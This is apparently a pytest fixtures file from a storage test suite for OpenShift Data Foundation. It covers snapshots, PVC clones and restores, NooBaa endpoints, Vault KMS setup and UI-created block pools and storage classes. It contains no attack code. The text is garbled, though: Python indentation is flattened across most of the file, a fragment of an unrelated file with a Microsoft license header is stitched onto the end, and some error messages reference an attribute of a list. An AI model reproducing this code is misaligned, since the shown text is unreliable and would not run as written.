== constants.NODE_READY_SCHEDULING_DISABLED
]
if scheduling_disabled_nodes:
schedule_nodes(scheduling_disabled_nodes)
ceph_health_check(tries=60)
request.addfinalizer(finalizer)
@pytest.fixture(scope="function")
def node_restart_teardown(request, nodes):
"""
Make sure all nodes are up and in 'Ready' state and if not,
try to make them 'Ready' by restarting the nodes.
"""
def finalizer():
# Start the powered off nodes
nodes.restart_nodes_by_stop_and_start_teardown()
try:
node.wait_for_nodes_status(status=constants.NODE_READY)
except ResourceWrongStatusException:
# Restart the nodes if in NotReady state
not_ready_nodes = [
n
for n in node.get_node_objs()
if n.ocp.get_resource_status(n.name) == constants.NODE_NOT_READY
]
if not_ready_nodes:
log.info(
f"Nodes in NotReady status found: {[n.name for n in not_ready_nodes]}"
)
nodes.restart_nodes_by_stop_and_start(not_ready_nodes)
node.wait_for_nodes_status(status=constants.NODE_READY)
request.addfinalizer(finalizer)
@pytest.fixture()
def mcg_connection_factory(request, mcg_obj, cld_mgr):
"""
Create a new MCG connection for given platform. If there already exists
a connection for the platform then return this previously created
connection.
"""
created_connections = {}
def _create_connection(platform=constants.AWS_PLATFORM, name=None):
"""
Args:
platform (str): Platform used for connection
name (str): New connection name. If not provided then new name will
                be generated. The new name will be used only if there is no
                existing connection for the given platform
Returns:
str: connection name
"""
if platform not in created_connections:
connection_name = name or create_unique_resource_name(
constants.MCG_CONNECTION, platform
)
mcg_obj.create_connection(cld_mgr, platform, connection_name)
created_connections[platform] = connection_name
return created_connections[platform]
def _connections_cleanup():
for platform in created_connections:
mcg_obj.delete_ns_connection(created_connections[platform])
request.addfinalizer(_connections_cleanup)
return _create_connection
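# Illustrative sketch only (not part of the original fixtures): the factory
# above caches one connection per platform, so repeated calls for the same
# platform return the same connection name. The function below is a
# hypothetical example, not a real test.
def _example_mcg_connection_reuse(mcg_connection_factory):
    first = mcg_connection_factory(platform=constants.AWS_PLATFORM)
    second = mcg_connection_factory(platform=constants.AWS_PLATFORM)
    # Same platform -> the previously created connection is reused.
    assert first == second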
@pytest.fixture()
def ns_resource_factory(
request, mcg_obj, cld_mgr, cloud_uls_factory, mcg_connection_factory
):
"""
Create a namespace resource factory. Calling this fixture creates a new namespace resource.
"""
created_ns_resources = []
def _create_ns_resources(platform=constants.AWS_PLATFORM):
# Create random connection_name
rand_connection = mcg_connection_factory(platform)
# Create the actual namespace resource
rand_ns_resource = create_unique_resource_name(
constants.MCG_NS_RESOURCE, platform
)
if platform == constants.RGW_PLATFORM:
region = None
else:
# TODO: fix this when https://github.com/red-hat-storage/ocs-ci/issues/3338
# is resolved
region = "us-east-2"
target_bucket_name = mcg_obj.create_namespace_resource(
rand_ns_resource,
rand_connection,
region,
cld_mgr,
cloud_uls_factory,
platform,
)
log.info(f"Check validity of NS resource {rand_ns_resource}")
if platform == constants.AWS_PLATFORM:
endpoint = constants.MCG_NS_AWS_ENDPOINT
elif platform == constants.AZURE_PLATFORM:
endpoint = constants.MCG_NS_AZURE_ENDPOINT
elif platform == constants.RGW_PLATFORM:
rgw_conn = RGW()
endpoint, _, _ = rgw_conn.get_credentials()
else:
raise UnsupportedPlatformError(f"Unsupported Platform: {platform}")
mcg_obj.check_ns_resource_validity(
rand_ns_resource, target_bucket_name, endpoint
)
created_ns_resources.append(rand_ns_resource)
return target_bucket_name, rand_ns_resource
def ns_resources_cleanup():
for ns_resource in created_ns_resources:
mcg_obj.delete_ns_resource(ns_resource)
request.addfinalizer(ns_resources_cleanup)
return _create_ns_resources
@pytest.fixture()
def namespace_store_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
@pytest.fixture(scope="session")
def namespace_store_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
@pytest.fixture()
def snapshot_factory(request):
"""
Snapshot factory. Calling this fixture creates a volume snapshot from the
specified PVC
"""
instances = []
def factory(pvc_obj, wait=True, snapshot_name=None):
"""
Args:
pvc_obj (PVC): PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name (str): Name to be provided for snapshot
Returns:
OCS: OCS instance of kind VolumeSnapshot
"""
snap_obj = pvc_obj.create_snapshot(snapshot_name=snapshot_name, wait=wait)
instances.append(snap_obj)
return snap_obj
def finalizer():
"""
Delete the snapshots
"""
snapcontent_objs = []
        # Get VolumeSnapshotContent from VolumeSnapshots and delete
# VolumeSnapshots
for instance in instances:
if not instance.is_deleted:
snapcontent_objs.append(
helpers.get_snapshot_content_obj(snap_obj=instance)
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for VolumeSnapshotContents to be deleted
for snapcontent_obj in snapcontent_objs:
snapcontent_obj.ocp.wait_for_delete(
resource_name=snapcontent_obj.name, timeout=240
)
request.addfinalizer(finalizer)
return factory
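# Illustrative sketch only (not part of the original fixtures): a minimal,
# hypothetical use of snapshot_factory. The pvc_factory fixture name and its
# arguments are assumptions based on the rest of ocs-ci, not defined here.
def _example_snapshot_factory_usage(pvc_factory, snapshot_factory):
    pvc_obj = pvc_factory(interface=constants.CEPHBLOCKPOOL, size=5)
    snap_obj = snapshot_factory(pvc_obj, wait=True)
    assert snap_obj.name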
@pytest.fixture()
def multi_snapshot_factory(snapshot_factory):
"""
Snapshot factory. Calling this fixture creates volume snapshots of each
PVC in the provided list
"""
def factory(pvc_obj, wait=True, snapshot_name_suffix=None):
"""
Args:
            pvc_obj (list): List of PVC objects from which snapshots have to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name_suffix (str): Suffix to be added to snapshot
Returns:
            list: List of OCS instances of kind VolumeSnapshot
"""
snapshot = []
for obj in pvc_obj:
log.info(f"Creating snapshot of PVC {obj.name}")
snapshot_name = (
f"{obj.name}-{snapshot_name_suffix}" if snapshot_name_suffix else None
)
snap_obj = snapshot_factory(
pvc_obj=obj, snapshot_name=snapshot_name, wait=wait
)
snapshot.append(snap_obj)
return snapshot
return factory
@pytest.fixture()
def snapshot_restore_factory(request):
"""
Snapshot restore factory. Calling this fixture creates new PVC out of the
specified VolumeSnapshot.
"""
instances = []
def factory(
snapshot_obj,
restore_pvc_name=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
):
"""
Args:
snapshot_obj (OCS): OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_name (str): Name to be provided for restored pvc
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
Returns:
PVC: Restored PVC object
"""
snapshot_info = snapshot_obj.get()
size = size or snapshot_info["status"]["restoreSize"]
restore_pvc_name = restore_pvc_name or (
helpers.create_unique_resource_name(snapshot_obj.name, "restore")
)
if snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHBLOCKPOOL).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHBLOCKPOOL).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_RBD_PVC_RESTORE_YAML
interface = constants.CEPHBLOCKPOOL
elif snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHFILESYSTEM).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHFILESYSTEM).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_CEPHFS_PVC_RESTORE_YAML
interface = constants.CEPHFILESYSTEM
restored_pvc = create_restore_pvc(
sc_name=storageclass,
snap_name=snapshot_obj.name,
namespace=snapshot_obj.namespace,
size=size,
pvc_name=restore_pvc_name,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
)
instances.append(restored_pvc)
restored_pvc.snapshot = snapshot_obj
restored_pvc.interface = interface
if status:
helpers.wait_for_resource_state(restored_pvc, status)
return restored_pvc
def finalizer():
"""
Delete the PVCs
"""
pv_objs = []
        # Get PV from PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
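# Illustrative sketch only (not part of the original fixtures): chaining the
# snapshot and restore factories defined above. pvc_factory is assumed to be
# the standard ocs-ci PVC fixture defined elsewhere; the flow itself is a
# hypothetical example.
def _example_snapshot_restore_chain(pvc_factory, snapshot_factory, snapshot_restore_factory):
    pvc_obj = pvc_factory(interface=constants.CEPHFILESYSTEM, size=5)
    snap_obj = snapshot_factory(pvc_obj)
    restored_pvc = snapshot_restore_factory(
        snapshot_obj=snap_obj,
        status=constants.STATUS_BOUND,
    )
    # The factory records the source snapshot and interface on the new PVC.
    assert restored_pvc.interface == constants.CEPHFILESYSTEM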
@pytest.fixture()
def multi_snapshot_restore_factory(snapshot_restore_factory):
"""
    Snapshot restore factory. Calling this fixture creates a new PVC out of
    each VolumeSnapshot provided in the list.
"""
def factory(
snapshot_obj,
restore_pvc_suffix=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
wait_each=False,
):
"""
Args:
            snapshot_obj (list): List of OCS instances of kind VolumeSnapshot
                which have to be restored to new PVCs
restore_pvc_suffix (str): Suffix to be added to pvc name
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
            list: List of restored PVC objects
"""
new_pvcs = []
status_tmp = status if wait_each else ""
for snap_obj in snapshot_obj:
log.info(f"Creating a PVC from snapshot {snap_obj.name}")
restore_pvc_name = (
f"{snap_obj.name}-{restore_pvc_suffix}" if restore_pvc_suffix else None
)
restored_pvc = snapshot_restore_factory(
snapshot_obj=snap_obj,
restore_pvc_name=restore_pvc_name,
storageclass=storageclass,
size=size,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
status=status_tmp,
)
            restored_pvc.snapshot = snap_obj
new_pvcs.append(restored_pvc)
if status and not wait_each:
for restored_pvc in new_pvcs:
helpers.wait_for_resource_state(restored_pvc, status)
return new_pvcs
return factory
@pytest.fixture(scope="session", autouse=True)
def collect_logs_fixture(request):
"""
    This fixture collects OCS logs after tier execution, which allows
    inspecting the cluster's status after the run regardless of its result.
"""
def finalizer():
"""
        Tracking both logs separately reduces the chance of collision
"""
if not config.RUN["cli_params"].get("deploy") and not config.RUN[
"cli_params"
].get("teardown"):
if config.REPORTING["collect_logs_on_success_run"]:
collect_ocs_logs("testcases", ocs=False, status_failure=False)
collect_ocs_logs("testcases", ocp=False, status_failure=False)
request.addfinalizer(finalizer)
def get_ready_noobaa_endpoint_count(namespace):
"""
    Get the number of ready noobaa endpoints
"""
pods_info = get_pods_having_label(
label=constants.NOOBAA_ENDPOINT_POD_LABEL, namespace=namespace
)
ready_count = 0
for ep_info in pods_info:
container_statuses = ep_info.get("status", {}).get("containerStatuses")
if container_statuses is not None and len(container_statuses) > 0:
if container_statuses[0].get("ready"):
ready_count += 1
return ready_count
@pytest.fixture(scope="function")
def nb_ensure_endpoint_count(request):
"""
Validate and ensure the number of running noobaa endpoints
"""
cls = request.cls
min_ep_count = cls.MIN_ENDPOINT_COUNT
max_ep_count = cls.MAX_ENDPOINT_COUNT
assert min_ep_count <= max_ep_count
namespace = defaults.ROOK_CLUSTER_NAMESPACE
should_wait = False
# prior to 4.6 we configured the ep count directly on the noobaa cr.
if version.get_semantic_ocs_version_from_config() < version.VERSION_4_6:
noobaa = OCP(kind="noobaa", namespace=namespace)
resource = noobaa.get()["items"][0]
endpoints = resource.get("spec", {}).get("endpoints", {})
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
else:
storage_cluster = OCP(kind=constants.STORAGECLUSTER, namespace=namespace)
resource = storage_cluster.get()["items"][0]
resource_name = resource["metadata"]["name"]
endpoints = (
resource.get("spec", {}).get("multiCloudGateway", {}).get("endpoints", {})
)
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if should_wait:
# Wait for the NooBaa endpoint pods to stabilize
try:
for ready_nb_ep_count in TimeoutSampler(
300, 30, get_ready_noobaa_endpoint_count, namespace
):
if min_ep_count <= ready_nb_ep_count <= max_ep_count:
log.info(
f"NooBaa endpoints stabilized. Ready endpoints: {ready_nb_ep_count}"
)
break
log.info(
f"Waiting for the NooBaa endpoints to stabilize. "
f"Current ready count: {ready_nb_ep_count}"
)
except TimeoutExpiredError:
raise TimeoutExpiredError(
"NooBaa endpoints did not stabilize in time.\n"
f"Min count: {min_ep_count}, max count: {max_ep_count}, ready count: {ready_nb_ep_count}"
)
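# Illustrative sketch only (not part of the original fixtures): the fixture
# above reads MIN_ENDPOINT_COUNT / MAX_ENDPOINT_COUNT from the requesting test
# class via request.cls, so a consuming class is expected to define them as
# class attributes. The class below is a hypothetical example, not a real test.
@pytest.mark.usefixtures("nb_ensure_endpoint_count")
class _ExampleNoobaaEndpointBounds:
    MIN_ENDPOINT_COUNT = 1
    MAX_ENDPOINT_COUNT = 2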
@pytest.fixture()
def pvc_clone_factory(request):
"""
Calling this fixture creates a clone from the specified PVC
"""
instances = []
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
):
"""
Args:
pvc_obj (PVC): PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
Returns:
PVC: PVC instance
"""
assert (
pvc_obj.provisioner in constants.OCS_PROVISIONERS
), f"Unknown provisioner in PVC {pvc_obj.name}"
if pvc_obj.provisioner == "openshift-storage.rbd.csi.ceph.com":
clone_yaml = constants.CSI_RBD_PVC_CLONE_YAML
interface = constants.CEPHBLOCKPOOL
elif pvc_obj.provisioner == "openshift-storage.cephfs.csi.ceph.com":
clone_yaml = constants.CSI_CEPHFS_PVC_CLONE_YAML
interface = constants.CEPHFILESYSTEM
size = size or pvc_obj.get().get("spec").get("resources").get("requests").get(
"storage"
)
storageclass = storageclass or pvc_obj.backed_sc
access_mode = access_mode or pvc_obj.get_pvc_access_mode
volume_mode = volume_mode or getattr(pvc_obj, "volume_mode", None)
# Create clone
clone_pvc_obj = pvc.create_pvc_clone(
sc_name=storageclass,
parent_pvc=pvc_obj.name,
clone_yaml=clone_yaml,
pvc_name=clone_name,
namespace=pvc_obj.namespace,
storage_size=size,
access_mode=access_mode,
volume_mode=volume_mode,
)
instances.append(clone_pvc_obj)
clone_pvc_obj.parent = pvc_obj
clone_pvc_obj.volume_mode = volume_mode
clone_pvc_obj.interface = interface
if status:
helpers.wait_for_resource_state(clone_pvc_obj, status)
return clone_pvc_obj
def finalizer():
"""
Delete the cloned PVCs
"""
pv_objs = []
        # Get PV from PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
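# Illustrative sketch only (not part of the original fixtures): a hypothetical
# use of pvc_clone_factory above; pvc_factory is assumed to be the standard
# ocs-ci PVC fixture defined elsewhere in this module.
def _example_pvc_clone_usage(pvc_factory, pvc_clone_factory):
    parent_pvc = pvc_factory(interface=constants.CEPHBLOCKPOOL, size=5)
    clone_obj = pvc_clone_factory(parent_pvc, status=constants.STATUS_BOUND)
    # The factory records the parent PVC and interface on the clone object.
    assert clone_obj.parent == parent_pvc
    assert clone_obj.interface == constants.CEPHBLOCKPOOL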
@pytest.fixture(scope="session", autouse=True)
def reportportal_customization(request):
if config.REPORTING.get("rp_launch_url"):
request.config._metadata["RP Launch URL:"] = config.REPORTING["rp_launch_url"]
@pytest.fixture()
def multi_pvc_clone_factory(pvc_clone_factory):
"""
    Calling this fixture creates a clone from each PVC in the provided list of PVCs
"""
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
wait_each=False,
):
"""
Args:
            pvc_obj (list): List of PVC objects from which clones have to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
            list: List of cloned PVC instances
"""
cloned_pvcs = []
status_tmp = status if wait_each else ""
for obj in pvc_obj:
# Create clone
clone_pvc_obj = pvc_clone_factory(
pvc_obj=obj,
clone_name=clone_name,
storageclass=storageclass,
size=size,
access_mode=access_mode,
volume_mode=volume_mode,
status=status_tmp,
)
cloned_pvcs.append(clone_pvc_obj)
if status and not wait_each:
for cloned_pvc in cloned_pvcs:
helpers.wait_for_resource_state(cloned_pvc, status)
return cloned_pvcs
return factory
@pytest.fixture(scope="function")
def multiple_snapshot_and_clone_of_postgres_pvc_factory(
request,
multi_snapshot_factory,
multi_snapshot_restore_factory,
multi_pvc_clone_factory,
):
"""
Calling this fixture creates multiple snapshots & clone of postgres PVC
"""
instances = []
def factory(pvc_size_new, pgsql):
"""
Args:
pvc_size_new (int): Resize/Expand the pvc size
pgsql (obj): Pgsql obj
Returns:
Postgres pod: Pod instances
"""
# Get postgres pvc list obj
postgres_pvcs_obj = pgsql.get_postgres_pvc()
snapshots = multi_snapshot_factory(pvc_obj=postgres_pvcs_obj)
log.info("Created snapshots from all the PVCs and snapshots are in Ready state")
restored_pvc_objs = multi_snapshot_restore_factory(snapshot_obj=snapshots)
log.info("Created new PVCs from all the snapshots")
cloned_pvcs = multi_pvc_clone_factory(
pvc_obj=restored_pvc_objs, volume_mode=constants.VOLUME_MODE_FILESYSTEM
)
log.info("Created new PVCs from all restored volumes")
        # Attach a new pgsql pod to the cloned pvcs
sset_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=cloned_pvcs, postgres_name="postgres-clone", run_benchmark=False
)
instances.extend(sset_list)
# Resize cloned PVCs
for pvc_obj in cloned_pvcs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
new_snapshots = multi_snapshot_factory(pvc_obj=cloned_pvcs)
log.info(
"Created snapshots from all the cloned PVCs"
" and snapshots are in Ready state"
)
new_restored_pvc_objs = multi_snapshot_restore_factory(
snapshot_obj=new_snapshots
)
log.info("Created new PVCs from all the snapshots and in Bound state")
        # Attach a new pgsql pod to the restored pvcs
pgsql_obj_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=new_restored_pvc_objs,
postgres_name="postgres-clone-restore",
run_benchmark=False,
)
instances.extend(pgsql_obj_list)
# Resize restored PVCs
for pvc_obj in new_restored_pvc_objs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
return instances
def finalizer():
"""
Delete the list of pod objects created
"""
for instance in instances:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def es(request):
"""
Create In-cluster elastic-search deployment for benchmark-operator tests.
    The name 'es' is used as a shortcut for elastic-search, for simplicity.
"""
def teardown():
es.cleanup()
request.addfinalizer(teardown)
es = ElasticSearch()
return es
@pytest.fixture(scope="session")
def setup_ui_session(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="class")
def setup_ui_class(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="function")
def setup_ui(request):
return setup_ui_fixture(request)
def setup_ui_fixture(request):
driver = login_ui()
def finalizer():
close_browser(driver)
request.addfinalizer(finalizer)
return driver
@pytest.fixture(scope="session", autouse=True)
def load_cluster_info_file(request):
"""
This fixture tries to load cluster_info.json file if exists (on cluster
installed via Flexy) and apply the information to the config object (for
example related to disconnected cluster)
"""
load_cluster_info()
@pytest.fixture(scope="function")
def pv_encryption_kms_setup_factory(request):
"""
    Create vault resources and set up the csi-kms-connection-details configMap
"""
vault = KMS.Vault()
def factory(kv_version):
"""
Args:
kv_version(str): KV version to be used, either v1 or v2
Returns:
object: Vault(KMS) object
"""
vault.gather_init_vault_conf()
vault.update_vault_env_vars()
# Check if cert secrets already exist, if not create cert resources
ocp_obj = OCP(kind="secret", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(resource_name="ocs-kms-ca-secret", column="NAME")
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.create_ocs_vault_cert_resources()
# Create vault namespace, backend path and policy in vault
vault_resource_name = create_unique_resource_name("test", "vault")
vault.vault_create_namespace(namespace=vault_resource_name)
vault.vault_create_backend_path(
backend_path=vault_resource_name, kv_version=kv_version
)
vault.vault_create_policy(policy_name=vault_resource_name)
# If csi-kms-connection-details exists, edit the configmap to add new vault config
ocp_obj = OCP(kind="configmap", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(
resource_name="csi-kms-connection-details", column="NAME"
)
new_kmsid = vault_resource_name
vdict = defaults.VAULT_CSI_CONNECTION_CONF
for key in vdict.keys():
old_key = key
vdict[new_kmsid] = vdict.pop(old_key)
vdict[new_kmsid]["VAULT_BACKEND_PATH"] = vault_resource_name
vdict[new_kmsid]["VAULT_NAMESPACE"] = vault_resource_name
vault.kmsid = vault_resource_name
if kv_version == "v1":
vdict[new_kmsid]["VAULT_BACKEND"] = "kv"
else:
vdict[new_kmsid]["VAULT_BACKEND"] = "kv-v2"
KMS.update_csi_kms_vault_connection_details(vdict)
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.kmsid = "1-vault"
vault.create_vault_csi_kms_connection_details(kv_version=kv_version)
return vault
def finalizer():
"""
Remove the vault config from csi-kms-connection-details configMap
"""
if len(KMS.get_encryption_kmsid()) > 1:
KMS.remove_kmsid(vault.kmsid)
# Delete the resources in vault
vault.remove_vault_backend_path()
vault.remove_vault_policy()
vault.remove_vault_namespace()
request.addfinalizer(finalizer)
return factory
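# Illustrative sketch only (not part of the original fixtures): a hypothetical
# call into the factory above; "v2" selects the KV v2 secrets engine when the
# backend path is created in Vault.
def _example_pv_encryption_kms_usage(pv_encryption_kms_setup_factory):
    vault = pv_encryption_kms_setup_factory(kv_version="v2")
    # The returned Vault object carries the kms id registered in the
    # csi-kms-connection-details configMap.
    assert vault.kmsid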
@pytest.fixture(scope="class")
def cephblockpool_factory_ui_class(request, setup_ui_class):
return cephblockpool_factory_ui_fixture(request, setup_ui_class)
@pytest.fixture(scope="session")
def cephblockpool_factory_ui_session(request, setup_ui_session):
return cephblockpool_factory_ui_fixture(request, setup_ui_session)
@pytest.fixture(scope="function")
def cephblockpool_factory_ui(request, setup_ui):
return cephblockpool_factory_ui_fixture(request, setup_ui)
def cephblockpool_factory_ui_fixture(request, setup_ui):
"""
    This function creates a new cephblockpool
"""
instances = []
def factory(
replica=3,
compression=False,
):
"""
Args:
            replica (int): replica size of the pool; 2 and 3 are supported for now
compression (bool): True to enable compression otherwise False
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the CephBlockPool.
"""
blockpool_ui_object = BlockPoolUI(setup_ui)
pool_name, pool_status = blockpool_ui_object.create_pool(
replica=replica, compression=compression
)
if pool_status:
log.info(
f"Pool {pool_name} with replica {replica} and compression {compression} was created and "
f"is in ready state"
)
ocs_blockpool_obj = create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL,
resource_name=pool_name,
)
instances.append(ocs_blockpool_obj)
return ocs_blockpool_obj
else:
blockpool_ui_object.take_screenshot()
if pool_name:
instances.append(
create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL, resource_name=pool_name
)
)
raise PoolDidNotReachReadyState(
f"Pool {pool_name} with replica {replica} and compression {compression}"
f" did not reach ready state"
)
def finalizer():
"""
        Delete the cephblockpool from the UI and, if that fails, from the CLI
"""
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Pool is already deleted")
continue
blockpool_ui_obj = BlockPoolUI(setup_ui)
if not blockpool_ui_obj.delete_pool(instance.name):
instance.delete()
raise PoolNotDeletedFromUI(
f"Could not delete block pool {instances.name} from UI."
f" Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_ui_class(
request, cephblockpool_factory_ui_class, setup_ui_class
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_class, setup_ui_class
)
@pytest.fixture(scope="session")
def storageclass_factory_ui_session(
request, cephblockpool_factory_ui_session, setup_ui_session
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_session, setup_ui_session
)
@pytest.fixture(scope="function")
def storageclass_factory_ui(request, cephblockpool_factory_ui, setup_ui):
return storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui)
def storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui):
"""
    This function creates a new storageclass
"""
instances = []
def factory(
provisioner=constants.OCS_PROVISIONERS[0],
compression=False,
replica=3,
create_new_pool=False,
encryption=False, # not implemented yet
reclaim_policy=constants.RECLAIM_POLICY_DELETE, # not implemented yet
default_pool=constants.DEFAULT_BLOCKPOOL,
existing_pool=None,
):
"""
Args:
provisioner (str): The name of the provisioner. Default is openshift-storage.rbd.csi.ceph.com
compression (bool): if create_new_pool is True, compression will be set if True.
replica (int): if create_new_pool is True, replica will be set.
create_new_pool (bool): True to create new pool with factory.
encryption (bool): enable PV encryption if True.
reclaim_policy (str): Reclaim policy for the storageclass.
            default_pool (str): Name of the pool to use when neither create_new_pool nor existing_pool is set.
            existing_pool (str): Name of an existing pool to use for the storageclass.
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the storageclass.
"""
storageclass_ui_object = StorageClassUI(setup_ui)
if existing_pool is None and create_new_pool is False:
pool_name = default_pool
if create_new_pool is True:
pool_ocs_obj = cephblockpool_factory_ui(
replica=replica, compression=compression
)
pool_name = pool_ocs_obj.name
if existing_pool is not None:
pool_name = existing_pool
sc_name = storageclass_ui_object.create_storageclass(pool_name)
if sc_name is None:
log.error("Storageclass was not created")
raise StorageclassNotCreated(
"Storageclass is not found in storageclass list page"
)
else:
log.info(f"Storageclass created with name {sc_name}")
sc_obj = create_ocs_object_from_kind_and_name(
resource_name=sc_name, kind=constants.STORAGECLASS
)
instances.append(sc_obj)
log.info(f"{sc_obj.get()}")
return sc_obj
def finalizer():
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Storageclass is already deleted")
continue
storageclass_ui_obj = StorageClassUI(setup_ui)
if not storageclass_ui_obj.delete_rbd_storage_class(instance.name):
instance.delete()
raise StorageClassNotDeletedFromUI(
f"Could not delete storageclass {instances.name} from UI."
f"Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
